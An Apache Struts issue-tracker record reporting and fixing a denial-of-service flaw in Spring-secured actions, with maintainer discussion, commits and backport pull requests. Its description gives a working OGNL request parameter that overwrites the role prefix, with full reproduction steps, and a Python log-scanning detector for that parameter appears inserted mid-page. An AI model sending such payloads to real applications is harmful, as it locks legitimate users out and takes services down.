Struts 2 / WW-4805

At least a DoS attack is available for Spring secured actions

    Details

    • Flags:
      Patch, Important

      Description

      This is a DoS attack example for when a Struts2 user uses Spring to secure his actions, as mentioned in the section `Initializing Actions from Spring` of the spring-plugin.

      Attack Steps:

      1. An anonymous user logs in as an authenticated user.
      2. Then tries
        http://{ip}:{port}/{action0-actionN}?advisors[{0-n}].advice.accessDecisionManager.decisionVoters[{0-n}].rolePrefix=breakit
        where {action0-actionN} are actions available for users.

      Attack Impacts:
      By replacing `rolePrefix`, the attacker blocks access to secured actions for all defined roles, even if they authenticate via login! So services are down and a webapp restart is required to get back to normal!!!

      Configuration Example:

      1. spring-security.xml
            <global-method-security secured-annotations="enabled" proxy-target-class="true" />
            <http auto-config="true" use-expressions="false">
                <intercept-url pattern="/**" access="IS_AUTHENTICATED_ANONYMOUSLY" />
            </http>
            <authentication-manager erase-credentials="false">
                <authentication-provider>
                    <user-service>
                        <user name="admin" password="admin" authorities="ROLE_ADMIN" />
                        <user name="user" password="user" authorities="ROLE_USER" />
                    </user-service>
                </authentication-provider>
            </authentication-manager>

      2. applicationContext.xml
            <bean id="secureAction" class="me.zamani.yasser.ww_convention.actions.SecureAction"/>

      3. struts.xml
            <action name="admin" class="secureAction" method="admin">
                <result name="success" type="json" />
            </action>
            <action name="user" class="secureAction" method="user">
                <result name="success" type="json" />
            </action>

      4. SecureAction.java
            package me.zamani.yasser.ww_convention.actions;

            import org.springframework.security.access.annotation.Secured;

            public class SecureAction {

                @Secured({"ROLE_ADMIN"})
                public String admin() {
                    return "success";
                }

                @Secured({"ROLE_USER"})
                public String user() {
                    return "success";
                }
            }

      5. Log in via
            http://{ip}:{port}/login
         as user.

      6. Open
            http://{ip}:{port}/user?advisors[0].advice.accessDecisionManager.decisionVoters[0].rolePrefix=breakit

      7. In another browser, log in via
            http://{ip}:{port}/login
         as admin.

      8. Try to access
            http://{ip}:{port}/admin
         which fails!

      9. Also repeat 5 and try to open
            http://{ip}:{port}/user
         which also fails!

      10. Services are down and a webapp restart is required to get back to normal.
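
The request shape in the steps above can be looked for in web-server access logs. The following Python sketch is an added example, not part of the original report or of the Struts code base: it flags query parameter names that reach into the Spring proxy chain, using the `accessDecisionManager` pattern suggested in the comments on this issue plus a second, assumed rule for the `advisors[n].advice` prefix. The log format, the rule names and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Rules are applied to the *decoded* parameter name and must match all of it.
RULES = {
    # Pattern suggested in the comments on this issue.
    "excluded-pattern": re.compile(r".*\.accessDecisionManager\..*"),
    # Assumption for this example: any name that starts at the proxy's
    # advisors[n].advice chain, whatever member it ends on.
    "proxy-advisor-walk": re.compile(r"advisors\[\d+\]\.advice\..*"),
}

# Combined-log-style request line: client address first, request in quotes.
REQUEST_LINE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Constructed sample log lines; addresses and timestamps are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Jun/2017:10:01:02 +0000] "GET /user HTTP/1.1" 200 17
203.0.113.7 - - [21/Jun/2017:10:01:09 +0000] "GET /user?advisors[0].advice.accessDecisionManager.decisionVoters[0].rolePrefix=breakit HTTP/1.1" 200 17
203.0.113.7 - - [21/Jun/2017:10:01:15 +0000] "GET /user?advisors%5B1%5D.advice.accessDecisionManager.decisionVoters%5B0%5D.rolePrefix=x HTTP/1.1" 200 17
198.51.100.4 - - [21/Jun/2017:10:02:00 +0000] "GET /admin?page=2&sort=name HTTP/1.1" 403 0
198.51.100.4 - - [21/Jun/2017:10:02:30 +0000] "POST /user?advice=none HTTP/1.1" 200 17
"""


def flag_parameter(name):
    """Return the names of all rules that the parameter name fully matches."""
    return [rule for rule, rx in RULES.items() if rx.fullmatch(name)]


def scan(log_text):
    """Return one finding per suspicious query parameter in an access log."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_LINE.match(line)
        if not m:
            continue  # not a request line in the expected format
        path, _, query = m.group("target").partition("?")
        # parse_qsl percent-decodes names, so %5B / %5D variants are caught too.
        for name, _value in parse_qsl(query, keep_blank_values=True):
            rules = flag_parameter(name)
            if rules:
                findings.append({
                    "line": lineno,
                    "client": m.group("client"),
                    "path": path,
                    "param": name,
                    "rules": rules,
                })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Access logs record only the query string, so the same parameter sent in a POST body is not visible to this check.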

          Activity

          githubbot ASF GitHub Bot added a comment -

          Github user lukaszlenart commented on the issue:

          https://github.com/apache/struts/pull/142

          The case with those changes is that they will affect everyone even if you don't use Spring so its scope should be narrowed just to the Spring Plugin. The simplest solution is to add a flag, a constant that by default should turn off this check, but the Spring Plugin should have this flag set on to enable additional scanning.

          The ultimate solution would be a voter mechanism injectable by the internal DI mechanism but this requires a bit more work.

          aleksandr-m Aleksandr Mashchenko added a comment -

          <constant name="struts.additional.excludedPatterns" value=".*\.accessDecisionManager\..*" /> Will save the day.

          githubbot ASF GitHub Bot added a comment -

          Github user aleksandr-m commented on the issue:

          https://github.com/apache/struts/pull/142

          @lukaszlenart Sounds good. Still, it would be nice to allow to turn this checking completely off even when spring plugin is present. The issue then can be avoided with addition of a simple pattern which should be faster.

          githubbot ASF GitHub Bot added a comment -

          Github user lukaszlenart commented on the issue:

          https://github.com/apache/struts/pull/142

          With the flag in place you can always disable it in your struts.xml even if the Spring Plugin is present.

          githubbot ASF GitHub Bot added a comment -

          Github user yasserzamani commented on the issue:

          https://github.com/apache/struts/pull/142

          Thank you @lukaszlenart , I got your point but what about when user uses Spring but not S2's Spring Plugin? i.e. when user does not want to define his/her actions as Spring beans but wants to use AOP on them.

          However, now, after my fourth commit, I don't think we should worry. I tested WW-4805's scenario heavily with hundreds of concurrent users via JMeter while profiling via YourKit. All of `ProxyUtil` methods just consume 186ms of the whole execution time, 137000ms, i.e. 0.001% ~= 0%. Before caching it was 7%.

          githubbot ASF GitHub Bot added a comment -

          Github user lukaszlenart commented on the issue:

          https://github.com/apache/struts/pull/142

          Yeah I understand but still this affects non-Spring users. And I think this can go in as is and we can improve and think about the Voters mechanism in 2.6.

          githubbot ASF GitHub Bot added a comment -

          Github user lukaszlenart commented on the issue:

          https://github.com/apache/struts/pull/142

          If no objections I am going to merge this PR, btw. I have created a task to implement Voters
          https://issues.apache.org/jira/browse/WW-4807

          githubbot ASF GitHub Bot added a comment -

          Github user cnenning commented on the issue:

          https://github.com/apache/struts/pull/142

          IMO this can be merged

          jira-bot ASF subversion and git services added a comment -

          Commit 64788152910a84e7755a8302896a1fa2d5ecef7d in struts's branch refs/heads/master from Yasser Zamani
          [ https://git-wip-us.apache.org/repos/asf?p=struts.git;h=6478815 ]

          WW-4805 Improves ProxyUtil performance via caching

          jira-bot ASF subversion and git services added a comment -

          Commit 4c386c663cf094a6d40d90c56c5983e14d518c26 in struts's branch refs/heads/master from Lukasz Lenart
          [ https://git-wip-us.apache.org/repos/asf?p=struts.git;h=4c386c6 ]

          WW-4805 Blocks ognl access to class members of Spring proxy

          githubbot ASF GitHub Bot added a comment -

          Github user asfgit closed the pull request at:

          https://github.com/apache/struts/pull/142

          githubbot ASF GitHub Bot added a comment -

          Github user lukaszlenart commented on the issue:

          https://github.com/apache/struts/pull/142

          @yasserzamani do you want to port some of those changes to 2.3.33? Or at least implement what @aleksandr-m mentioned in a comment?

          githubbot ASF GitHub Bot added a comment -

          Github user yasserzamani commented on the issue:

          https://github.com/apache/struts/pull/142

          @lukaszlenart , Yes with pleasure. I should come with a new PR but on branch support-2-3, right?

          githubbot ASF GitHub Bot added a comment -

          Github user lukaszlenart commented on the issue:

          https://github.com/apache/struts/pull/142

          Yes, you must branch off from the `support-2-3` branch and open a PR against that branch after all

          hudson Hudson added a comment -

          SUCCESS: Integrated in Jenkins build Struts-JDK7-master #639 (See https://builds.apache.org/job/Struts-JDK7-master/639/)
          WW-4805 Improves ProxyUtil performance via caching (yasser.zamani: rev 64788152910a84e7755a8302896a1fa2d5ecef7d)

          • (edit) core/src/main/java/com/opensymphony/xwork2/util/ProxyUtil.java
          githubbot ASF GitHub Bot added a comment -

          Github user aleksandr-m commented on the issue:

          https://github.com/apache/struts/pull/142

          @lukaszlenart
          > The simplest solution is to add a flag, a constant that by default should turn off this check, but the Spring Plugin should have this flag set on to enable additional scanning.

          I'll create a PR implementing this in a few days.

          githubbot ASF GitHub Bot added a comment -

          GitHub user yasserzamani opened a pull request:

          https://github.com/apache/struts/pull/145

          WW-4805 Ports some of PR #142 changes to branch support-2-3

          Ports only security related changes of #142 to branch support-2-3

          You can merge this pull request into a Git repository by running:

          $ git pull https://github.com/yasserzamani/struts support-2-3-WW-4805

          Alternatively you can review and apply these changes as the patch at:

          https://github.com/apache/struts/pull/145.patch

          To close this pull request, make a commit to your master/trunk branch
          with (at least) the following in the commit message:

          This closes #145


          commit 583da3d5df5aeeded3beadca6305a98c5618e46b
          Author: Yasser Zamani <yasser.zamani@live.com>
          Date: 2017-06-21T12:10:29Z

          WW-4805 Blocks ognl access to class members of Spring proxy


          githubbot ASF GitHub Bot added a comment -

          Github user lukaszlenart commented on the issue:

          https://github.com/apache/struts/pull/145

          I'm not able to merge this PR as it also contains some changes from the `master` branch - I have no idea how it happens, maybe some GitHub PR's magic :\ I will try to cherry-pick this.

          githubbot ASF GitHub Bot added a comment -

          Github user lukaszlenart commented on the issue:

          https://github.com/apache/struts/pull/145

          Did you cherry-pick changes from your original branch? As this is the only option to port changes merged to the `master` branch back to the `support-2-3` branch.

          githubbot ASF GitHub Bot added a comment -

          Github user yasserzamani commented on the issue:

          https://github.com/apache/struts/pull/145

          😕 When I was in my branch `master`, I checked out my `support-2-3`. Then I pulled apache `support-2-3` then pushed into my `support-2-3`. I confirmed via github that my `support-2-3` and apache `support-2-3` are even ( at [here](https://github.com/yasserzamani/struts/tree/support-2-3) ). Then I checked out my `support-2-3` as a new branch named `support-2-3-WW-4805`. Finally I made my changes on it, then committed and pushed it as a new branch into my github, then created this PR against apache `support-2-3`.

          At github all things seem good!

          githubbot ASF GitHub Bot added a comment -

          Github user yasserzamani commented on the issue:

          https://github.com/apache/struts/pull/145

          Forgot to say I did not do any cherry-pick

          githubbot ASF GitHub Bot added a comment -

          Github user lukaszlenart commented on the issue:

          https://github.com/apache/struts/pull/145

          So you have made all the changes by hand, not by merging in another branch, right?

          githubbot ASF GitHub Bot added a comment -

          Github user yasserzamani commented on the issue:

          https://github.com/apache/struts/pull/145

          Yes. All done by copying just raw texts then delete or edit them. I was aware that merging will mix things up and is confusing so I avoided.

          Do you have trouble with the mirrored github or apache's original repository?

          githubbot ASF GitHub Bot added a comment -

          Github user lukaszlenart commented on the issue:

          https://github.com/apache/struts/pull/145

          After checking out your PR locally I cannot build it on JDK6 (Struts 2.3.x must be built on JDK 6)

          githubbot ASF GitHub Bot added a comment -

          Github user yasserzamani commented on the issue:

          https://github.com/apache/struts/pull/145

          Thanks! I did not try JDK6. Please let me check.

          githubbot ASF GitHub Bot added a comment -

          Github user yasserzamani commented on the issue:

          https://github.com/apache/struts/pull/145

          OK, I tried JDK6 which firstly has failed with heap out of memory message at `Running org.apache.struts2.components.UIComponentTest`. But when I replaced JDK with a 64bit version and `-Xmx2048m`, then `mvn -DskipAssembly=true install` exited successfully with code 0. Used Maven version was 3.2.5, latest JDK6 compatible maven.

          Do you get same error message as me (i.e. heap out of memory) when you use `mvn -X`?

          githubbot ASF GitHub Bot added a comment -

          Github user lukaszlenart commented on the issue:

          https://github.com/apache/struts/pull/145

          Nope, I'm getting compilation errors:
          ```
          [ERROR] chainHistory = new LinkedList<>();
          ```

          which means when I fetch your PR it was merged against the `master` branch instead of the `support-2-3` - I need to figure out what's going on.

          githubbot ASF GitHub Bot added a comment -

          Github user yasserzamani commented on the issue:

          https://github.com/apache/struts/pull/145

          @lukaszlenart , it seems it occurred just on your local PC during git fetch and there is not any issue with github or original apache repositories. Please revert your local changes and try check out instead of fetch. I remember the fetch does a merge too!

          jira-bot ASF subversion and git services added a comment -

          Commit 583da3d5df5aeeded3beadca6305a98c5618e46b in struts's branch refs/heads/support-2-3 from Yasser Zamani
          [ https://git-wip-us.apache.org/repos/asf?p=struts.git;h=583da3d ]

          WW-4805 Blocks ognl access to class members of Spring proxy

          jira-bot ASF subversion and git services added a comment -

          Commit ae5630197980fe431f84eb26523f3b23b71f91bc in struts's branch refs/heads/support-2-3 from Lukasz Lenart
          [ https://git-wip-us.apache.org/repos/asf?p=struts.git;h=ae56301 ]

          WW-4805 Ports proxy detection to 2.3

          githubbot ASF GitHub Bot added a comment -

          Github user asfgit closed the pull request at:

          https://github.com/apache/struts/pull/145

          githubbot ASF GitHub Bot added a comment -

          Github user lukaszlenart commented on the issue:

          https://github.com/apache/struts/pull/145

          Nope, I mean PRs are a GitHub specific feature, and looks like PR is always merged with the `master` branch so checking out the PR isn't an option to test non-`master` PRs

          https://help.github.com/articles/checking-out-pull-requests-locally/

          For reference:
          I had to add your repository as another `remote` and fetch your branch directly and merge it into the `support-2-3` branch to work around the above problem.

          hudson Hudson added a comment -

          SUCCESS: Integrated in Jenkins build Struts-support-2-3-JDK6 #3 (See https://builds.apache.org/job/Struts-support-2-3-JDK6/3/)
          WW-4805 Blocks ognl access to class members of Spring proxy (yasser.zamani: rev 583da3d5df5aeeded3beadca6305a98c5618e46b)

          • (edit) xwork-core/src/test/java/com/opensymphony/xwork2/spring/ActionsFromSpringTest.java
          • (edit) xwork-core/src/main/java/com/opensymphony/xwork2/ognl/SecurityMemberAccess.java
          • (edit) xwork-core/src/test/resources/com/opensymphony/xwork2/spring/actionContext-xwork.xml
          • (add) xwork-core/src/main/java/com/opensymphony/xwork2/util/ProxyUtil.java
          githubbot ASF GitHub Bot added a comment -

          GitHub user yasserzamani opened a pull request:

          https://github.com/apache/struts/pull/147

          WW-4805: Adds constant to control proxy member access (support-2-3)

          Ports #146 to branch support-2-3.

          You can merge this pull request into a Git repository by running:

          $ git pull https://github.com/yasserzamani/struts support-2-3_WW-4805_2

          Alternatively you can review and apply these changes as the patch at:

          https://github.com/apache/struts/pull/147.patch

          To close this pull request, make a commit to your master/trunk branch
          with (at least) the following in the commit message:

          This closes #147


          commit 086b63735527d4bb0c1dd0d86a7c0374b825ff24
          Author: Yasser Zamani <yasser.zamani@live.com>
          Date: 2017-07-07T09:05:10Z

          Adds constant to control proxy member access


          githubbot ASF GitHub Bot added a comment -

          Github user asfgit closed the pull request at:

          https://github.com/apache/struts/pull/147


            People

            • Assignee:
              Unassigned
              Reporter:
              yasser.zamani Yasser Zamani